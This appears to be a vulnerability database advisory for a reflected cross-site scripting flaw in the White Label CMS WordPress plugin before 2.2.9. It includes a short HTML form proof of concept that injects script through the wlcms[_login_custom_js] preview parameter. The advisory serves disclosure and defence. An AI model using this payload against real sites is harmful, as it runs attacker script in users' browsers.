WordPress Plugin Vulnerabilities
White Label MS < 2.2.9 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing, leading to a Reflected Cross-Site Scripting issue
Proof of Concept
In v < 2.2.8, both unauthenticated and authenticated users can be attacked with it. In 2.2.8, it will only trigger against authenticated user <html> <body> <form action="https://example.com/wp-login.php?wlcms-action=preview" method="POST"> <input type="text" value='alert(/XSS/);' name="wlcms[_login_custom_js]" /> <input type="submit" value="Exploit me pls" /> </form> </body> </html>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-07 (about 2 years ago)
Added
2022-02-07 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)